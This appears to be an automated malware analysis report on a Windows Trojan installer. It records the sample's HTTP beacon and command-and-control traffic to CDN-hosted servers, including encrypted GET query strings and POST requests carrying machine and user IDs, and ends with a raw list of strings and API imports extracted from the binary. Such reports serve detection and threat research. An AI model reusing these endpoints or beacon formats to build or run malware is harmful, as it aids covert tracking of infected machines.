GET /13880.ashx?e=/k6kR j50tpQhScA1jb3T678RHvyUzuSnvZi s3jtzH3VPP0BYZZ/JwQnkcbjmdiLntfO9v5CwenNguChnjFY5WBf8neB9xf6b0sIPAmWA2SRtjwxr6c3A3wki0FfzrnQR6/4IivvmTPCdbENzDOdINNHDNP6/8qLhu0b45kiT 2Xfi4eCjhjMjKRY6Iofb7pjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FIDHLn8j4ExZ HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:18 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /13880.ashx?e=LCnUzM5l8JJaxM 7zJTMJ9137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWM xh4nuC6oveZAqHIGghM2z4gguKWlYXSbLSETjdRk/LFERPAVIGuKcHXu0JfAt7SC33dsLChBqc6UHTXUDwdyRvBIh2ZnXk/7WBlE7tcVHOnXEWwJ3p8Ee26L2Wr/0PLqD33Si2HsThqLATEMV5kP5vIZgJ5GLR56rDE3ecnl2ePydDVX2aJbSky7hG9JvxnZQiRYsqqweewtZRH9NJG7NGsiglm4ZVzUNL2cV/xGFrNaX60VvhkmEh4NuIRidikbwxdTJ69ttH1NT6eTehRAmHgKct86InYV27rAQ7etpX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF5EJsKPMaWgh05hGtpiOOjBzf9yT96LOkA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:18 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /13880.ashx?e=LCnUzM5l8JJaxM 7zJTMJ9137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWA2yDM6d7piii11NaYYxcNku1SXIq07tJg ABjx4/MVnPaT JG0G pPE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KyAIG5PuBtaTrGbcX FTMvYVabDw7nDGU2 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:18 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /13880.ashx?e=hpY1rXLYst6pJ45fVU/vC0HhmP0JRCH4GcG9b3qYXxr UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45wR Wfb4Zsa/MPo3f 1FoU88LbHT B3j4QS3i7uWq3eyaPJBwCOHNX9jATJeWJrFDkfFuh5aQNK5gKkdlz1lRoVNSQ3lQpjLdBPEhRyyBD7DFByCWgHBKY2uUZfpR/sUHTuXTWi43QJaHiemLsn8TNk9fYJlVn4GQU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adQEusj qMbDORiwaTnD6iozcfLyea4BcvR2N fPKcoYA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:18 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
HTTP/1.1 200 OK..Date: Mon, 29 Jun 2015 04:47:18 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

POST /br.ashx?pid={PID}&aid={AID}&ss=0&s=F6Nzamodk0,99999999-9999-490d-ae0d-57b7b591d16f,&v=2.1.9.476&md5=5f53f6b6b77b6c86decfc0ea972a3724&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=0F21F0C2-B8D7-4B08-8BD5-E9AF71328A77 HTTP/1.0

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)

Host: d23ocewf5ttxmu.cloudfront.net

Content-Length: 2298

Connection: Keep-Alive

Pragma: no-cache

d=noFFkUNdh3YmrGssTLI4pAP6Bn695OYH/RicF u5TVN1PT/aQqbL2Rz3ODEGLYsR0Rd/jLXJNIUTOfJiowBJ3jWRbT1vomqxwe8RLrVo3VUxp1 b/FwVf8/Ibm0U5NldSf/ J5s2nu8tYYEudjfW7hXe5coaxokvcUudiGl4Hpg7wpOenIBKEcSs35V00GWHqObp5uLx9I0yfcxvUpbUILDCvWqnxqWWnz0nW/0rYRtbGH7Khucx7gEC2akjH0 HVMkv77MzeawUEN0fhHl/49CMvyE/owVWNSjvvC99Nn4RGTsG74Uns0bpOBR4QNpw3/zZMND5qj4ZUgiPlZtRooklegXItlFhJyDz0VxzVbfFSQ6XtNp2d6SlMVxNsIqtmAi661 TdrVZDm2dspSrEA5/ oasXs0V7OUnuTtAB4 /H3OJNFR9qfuY7Xk2U7GhpZtGlj60S okbwgyojJP6u/YByRemOxhRu4ntvbUDbtFELLYT/qlDcHFfwVAtgdZXLrHcOeRWI/YvmwYrcPdiRrnRmZSptzpu0zCVtgk970MQ9f/M0Cb8Vv2aENWs5tdw7VD6cDaHrEkk8JSUZ1dR5Xx30XsJ4hEFKQKLIlgmu5yFmCFsCCfca7CEG gijExu2EnP6iMhXmJyyNplILusKahZDdXtUu/tQhFtpEEXqCQjs2ejClO2HW8iLwO5SSABvFq2l9HTVdAKLZkNDFF 3vJzcj2w  0CKO0mg3VGDYZRcpJgx4JAz9bAsN1YUJr3PUTEMjPqTlgs2Nfotq47Fc3ZRvo8434HmCxyVhypjHsBqLR784nu/msmIytemB2O53YoK65mWsBOotvDaGwXxMjceVMUNfHdyNaqgzYs2EcrajNlvn5NmiPdCTMLTMMSolCrcqkkK/DxgtGIx4tFYnL2GQTtasythCP4bLMM5VN8UtOzisknmzu4smsR1 fS1bSWwRnV3 v6VTcMPhrlMsqxzdx3eR3NPz9f6T3HyP HDk0rdhSYPw6fd4KrlW36QUoWD0RpEdgOPhapEm pLNLwza6rORFLcWpAGY57hJlXn2hHyoRE50
HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private,no-cache, no-store

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 29 Jun 2015 04:48:16 GMT

X-Cache: Miss from cloudfront

Via: 1.1 cd103c18819ef0db201c8a8cb9162bd2.cloudfront.net (CloudFront)

X-Amz-Cf-Id: FIMAVgrV_UA1n0PocdDvnrCzifh09DFwHEBF7xUFWHKOUG1cN71ryA==

POST /br.ashx?pid={PID}&aid={AID}&ss=0&s=F6Nzamodk0,99999999-9999-490d-ae0d-57b7b591d16f,&v=2.1.9.476&md5=5f53f6b6b77b6c86decfc0ea972a3724&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=0F21F0C2-B8D7-4B08-8BD5-E9AF71328A77 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)

Host: d23ocewf5ttxmu.cloudfront.net

Content-Length: 2298

Connection: Keep-Alive

Cache-Control: no-cache

d=noFFkUNdh3YmrGssTLI4pAP6Bn695OYH/RicF u5TVN1PT/aQqbL2Rz3ODEGLYsR0Rd/jLXJNIUTOfJiowBJ3jWRbT1vomqxwe8RLrVo3VUxp1 b/FwVf8/Ibm0U5NldSf/ J5s2nu8tYYEudjfW7hXe5coaxokvcUudiGl4Hpg7wpOenIBKEcSs35V00GWHqObp5uLx9I0yfcxvUpbUILDCvWqnxqWWnz0nW/0rYRtbGH7Khucx7gEC2akjH0 HVMkv77MzeawUEN0fhHl/49CMvyE/owVWNSjvvC99Nn4RGTsG74Uns0bpOBR4QNpw3/zZMND5qj4ZUgiPlZtRooklegXItlFhJyDz0VxzVbfFSQ6XtNp2d6SlMVxNsIqtmAi661 TdrVZDm2dspSrEA5/ oasXs0V7OUnuTtAB4 /H3OJNFR9qfuY7Xk2U7GhpZtGlj60S okbwgyojJP6u/YByRemOxhRu4ntvbUDbtFELLYT/qlDcHFfwVAtgdZXLrHcOeRWI/YvmwYrcPdiRrnRmZSptzpu0zCVtgk970MQ9f/M0Cb8Vv2aENWs5tdw7VD6cDaHrEkk8JSUZ1dR5Xx30XsJ4hEFKQKLIlgmu5yFmCFsCCfca7CEG gijExu2EnP6iMhXmJyyNplILusKahZDdXtUu/tQhFtpEEXqCQjs2ejClO2HW8iLwO5SSABvFq2l9HTVdAKLZkNDFF 3vJzcj2w  0CKO0mg3VGDYZRcpJgx4JAz9bAsN1YUJr3PUTEMjPqTlgs2Nfotq47Fc3ZRvo8434HmCxyVhypjHsBqLR784nu/msmIytemB2O53YoK65mWsBOotvDaGwXxMjceVMUNfHdyNaqgzYs2EcrajNlvn5NmiPdCTMLTMMSolCrcqkkK/DxgtGIx4tFYnL2GQTtasythCP4bLMM5VN8UtOzisknmzu4smsR1 fS1bSWwRnV3 v6VTcMPhrlMsqxzdx3eR3NPz9f6T3HyP HDk0rdhSYPw6fd4KrlW36QUoWD0RpEdgOPhapEm pLNLwza6rORFLcWpAGY57hJlXn2h
HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private,no-cache, no-store

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 29 Jun 2015 04:48:14 GMT

X-Cache: Miss from cloudfront

Via: 1.1 8ba00e7b6e8959a64c4f6f61fd5596de.cloudfront.net (CloudFront)

X-Amz-Cf-Id: SuTMswIi_ZDlmJ5mSn57LBRnQaRm7dt0EJWf-nst2tUg5285NxhcqQ==

POST /br.ashx?pid={PID}&aid={AID}&ss=0&s=F6Nzamodk0,99999999-9999-490d-ae0d-57b7b591d16f,&v=2.1.9.476&md5=70c2941195cd1efe529fc86f958991c2&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=0F21F0C2-B8D7-4B08-8BD5-E9AF71328A77 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)

Host: d23ocewf5ttxmu.cloudfront.net

Content-Length: 2294

Connection: Keep-Alive

Cache-Control: no-cache

d=noFFkUFdv3Y6rXcsTLI4sBuD g02hlkWTOX/F6U0FhcaFqDa1i9UuBp0NyL7WFkBGHRMNyga7nyzSrE5nvDalVbUpCVPaMadcimiAJZpgHP7G8bNGZIxH3ByKtCCuyzHQE/r4s/EBy9JheywC4BcGvMMf Wjekl6HxwkLA ragQeQ4ZORjyRj0j90cEZVq62jt09o/8pmIMGlS7LY9q0yXVrSEpoAjKY4YJ5PlYAYMQEV UgfjCLyrRBMm1FBcfZXRY9 tbiHTXZpFoL1pSHcPKHSykCGAdDf5lHq/RIx7VEiATkz/hYIvFMBSuSIOtSNo83N1zdcfmji/BFWz9VkkbtXGIPU3oRRICjfczu7T0tY0WWBjkkFebL5eT0qiU4bloGZCL7TFqC9lAZXM58Z2sbxSiCtHGqP7s/TTZNjlLqbnLO8yHDtUGb6T1PZMZcwsYQNZhTyfM7BYjmRle1X4HwcjjfNQ9RvRYXIPy7Wc1BSJ y/AyLVx3p4Ea/W0MQMqgHYYqeTkLfTgXOOZ p3csgdsPxig3ikhJb7wEorO2OOPTPon3pPDLP/TLMJ5GcgEwHFoZTcwcUJXefmdaIjKJM7BdkLZGYuV1so1T073Uk/Z77aGDrFVCmI3BZXbrdTqxLvw4Reeu1BsZHTzd7qFGRZLN0eg0uRo0dQFh2TdGUkQwUCGq7HOs5VWJRRt6VMDkj0fqsLB1thFF z4qy50m50hz0r9EfWJvpPM12pkJgZbAFP8bY Te18Wiyc6LQNOWmGSh3iRIz/fNeYdxcbnmMFZrwi38dnciVFxnt9V/0nGeMlBEkgt/aphaR1Pfu7WMLtuoLlSR52RfW8ExnSFXZMtD2KBnGpzLAHCEF9sTfmxxkqzINCK0GTezZmdGQw9uxqV2KWkL/cT2G65qflFNaFwmG5PdWSZt45J1y5fRC 15SXKncB4zIn67pV99gJNUdkHPhVj/6T/rJxGdbDl4XHiFVmCjZPBuRnrVhOKvWL/IY1IZVut0eUm2X7w6o 5lUPkA4RFNY8sV1aItsXvsOJFHIWUwf6ZWLpXyKqhCxBCJf
HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private,no-cache, no-store

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 29 Jun 2015 04:47:48 GMT

X-Cache: Miss from cloudfront

Via: 1.1 cd103c18819ef0db201c8a8cb9162bd2.cloudfront.net (CloudFront)

X-Amz-Cf-Id: PYpiEZ2lLpu7pKuwC3dJznjCgEZRROFLn97rLeab0pPF6GzxjRri7Q==

GET /t.ashx?e=aonlVHCKlbULjT49fHfOTJHuIH6CGwpk/Dn8i7qp5mAHqUQ0J3/4ExTjoJMNpFu8AVhT/AnR7cNDjocuWGH5DkG9rwS1lKyqGxrTqW15vZAdYLC6Fwg82dCUHeR8YCF3BQ8MIYMfS0tAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: z51hj2j2v-mzxspesu.netdna-ssl.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:17 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
abfgshdgfjhskHTTP/1.1 200 OK..Date: Mon, 29 Jun 2015 04:47:17 GMT..Con
tent-Type: text/html; charset=utf-8..Content-Length: 13..Connection: k
eep-alive..Cache-Control: private,no-cache, no-store..X-AspNet-Version
: 2.0.50727..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X-Cache:
 MISS..abfgshdgfjhsk..

GET /13880.ashx?e=hNMAVKhukrwSbACHvkgz8d137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWLqfIekNLhs5jgb6v7cXpPu93RkgrfPIdK/1bjUefs49JU1ySiay1sqdymVuPyjsZySWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZ7vOXSewT2cgmvUvxZp4nE49Kh4YjX7n00JqwRadIw1A== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:17 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /13880.ashx?e=hNMAVKhukrwSbACHvkgz8d137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWPa HuGTRyAEFAL52sIXt4Ua8Zp/ 13YC175vqqyfEnMnylXnslTRg848241y0s0/3gUxyF5wkLuxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsgCBuT7gbWk6xm3F/hUzL2FWmw8O5wxlNg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:17 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /13880.ashx?e=hNMAVKhukrwSbACHvkgz8d137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWKnmGGYVS7/B0JQd5HxgIXfmCWsTLnvD bTtF4P/Nzf4R5ehg170ggfw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVpXZrelYJPLUrmhU/capljenNguChnjFY5WBf8neB9xf6b0sIPAmWA2SRtjwxr6c3CfN21vL8MkF HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:17 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /13880.ashx?e=LCnUzM5l8JJaxM 7zJTMJ9137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWL6tRdMI7h/vKYX3Ti/i3YOjZeNnmCpUenKu2vOv4IU1x7lHbgMeClaNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FIDHLn8j4ExZ HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:17 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /13880.ashx?e=AZwPyJy3TZihee7pGMSR6XSp0dcZrdBnOtjdAsNaFT6my6t0 u4xzY1hNpWaoDmrUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/9qwl8XcknIZKuYFH/XSaEbogTtuHHrMWWMnNHFDGURn5DGpjUikD3FvcC/Rx6cjo1qg9mP3gfJNetwXok6MQkygRO0KnCdHCCNiNeNKIpAJfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXkQmwo8xpaCHTmEa2mI46MHN/3JP3os6Q HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:18 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /13880.ashx?e=aQQpsP6/AW0LjT49fHfOTJHuIH6CGwpk/Dn8i7qp5mB38psj3UbutFu0ICSu0QOYghmiZJc6KBe9Kbi6m4oCRnu85dJ7BPZyCa9S/FmnicTj0qHhiNfufds34bxlLfK5DHGXB7YFOPGqHZcQIdNYOTmpOQWDw6hY4u3oGHN86wOkpZrNsvTHKpXcKSoKf7ImsTIe5wObHey9BKGIpZn1wUSPdqmKrASUuW0z4fDf/CL5icQHUvxQfe2KCefkiIqiSoA1acazRDQ3/hMAj7hCtv2fF1nx0QWILbeTSdCAAmVfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXkQmwo8xpaCHTmEa2mI46MHN/3JP3os6Q HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:18 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /13880.ashx?e=LCnUzM5l8JJaxM 7zJTMJ9137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWKv9x4TEPS62BPEhRyyBD7DR614fwrEG1qQdf661A7a3sYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp1AS6yP6oxsM5GLBpOcPqKjNx8vJ5rgFy9HY3588pyhg HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:18 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /13880.ashx?e=LCnUzM5l8JJaxM 7zJTMJ9137P FaWoaORGR0jmj7WQgzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wFYtrOl7BfDWAo1JeSgT 5XmlmKz1/6dN1Rfc9FsqZ5xt9dN4nGKxRz8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWOVgX/J3gfcX m9LCDwJlgNkkbY8Ma nNwnzdtby/DJBQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:18 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /13880.ashx?e=XJYuqQQo69d2lr6SLgmZct137P FaWoaylUc74 Qgg8gzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wF6p84vT1Zqrte3upwN8WEnBPEhRyyBD7DXy8/ CI2m OeVBPFbDua/xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsgCBuT7gbWk6xm3F/hUzL2FWmw8O5wxlNg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

GET /13880.ashx?e=XJYuqQQo69d2lr6SLgmZct137P FaWoaylUc74 Qgg8gzQKqaxF9uzTxsSAVFvckt57skbJUfWVF1v9LxgoeQ9yvhlGeipNVcQ8ZdcRA3YGWd6e40Xi2FD7e7/ zz1cHqQ738O45G6msghrXFy3siXO3wxFdr3Z/7Mx 8Je68wF6p84vT1Zqrte3upwN8WEnBPEhRyyBD7DXy8/ CI2m OeVBPFbDua/xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsgCBuT7gbWk6xm3F/hUzL2FWmw8O5wxlNg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: yzkpnc17y-mzxspesu.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 29 Jun 2015 04:47:19 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
HTTP/1.1 200 OK..Date: Mon, 29 Jun 2015 04:47:19 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

@.reloc

[email protected]

OtSSh

VQSSh

PSSSSSSh

t!SSh\

PSSSSh

j.Yf;

_tcPVj@

.PjRW

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

operator

GetProcessWindowStation

dbghelp.dll

%Y-%m-%dT%H:%M:%SZ

1.3.6.1.4.1.311.2.1.12

Cannot put the trigger ID: %x

{X-hX-hX-XX-XXXXXX}

Host Name: %s

Domain Name: %s

DHCP scope name: %s

GetNetworkParams failed with error: %d

WinHttpGetIEProxyConfigForCurrentUser failed with the following error number:

ERROR_WINHTTP_INTERNAL_ERROR

AutoConfigURL (MyProxyConfig.lpszAutoConfigUrl) is:

AutoConfigURL (MyProxyConfig.lpszProxy) is:

AutoConfigURL (is:

550e832f-a497-4eb7-bb40-8cc856f6d152

RegCreateKeyTransactedW

RegOpenKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

C:\BUILDS\Build_STUB\Installer\Release_YTDK\YTDKi.pdb

GetProcessHeap

KERNEL32.dll

EnumThreadWindows

EnumChildWindows

MsgWaitForMultipleObjectsEx

GetKeyboardLayoutList

USER32.dll

WS2_32.dll

GDI32.dll

RegOpenKeyExW

RegEnumKeyW

RegCloseKey

RegCreateKeyExW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

RegOpenKeyW

RegNotifyChangeKeyValue

ADVAPI32.dll

ShellExecuteExW

ShellExecuteW

SHELL32.dll

ole32.dll

OLEAUT32.dll

OLEACC.dll

COMCTL32.dll

PSAPI.DLL

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

VERSION.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

SHFileOperationW

RPCRT4.dll

HttpSendRequestExW

HttpSendRequestW

HttpAddRequestHeadersW

HttpQueryInfoW

HttpOpenRequestW

HttpEndRequestW

WININET.dll

GetCPInfo

zcÁ

.?AVChromeBrowserWindow@@

.?AVFirefoxBrowserWindow@@

.?AVOperaBrowserWindow@@

.?AVCHttpFileDownload@@

.?AVCHttpAsync@@

.?AVCHttpDownload@@

.?AVCHttp@@

222222222

55555.ccc

22222222

22222222222

2222222222

222222222222

))aaaaaaaaaaaaa555555.7.??.cccccccAAAAAAAAAAAAA

2222222

..ccc

5.77..Lc7cEEcc7AAATE

|444|44|4

||||4|444

MM.LJ

MMM)MMBMBMBB???BBB??..?....L7.LLLEEEEEATAT

CMIC.CF?

@@,,@@,@@@@

**,,,,@,,@@,,

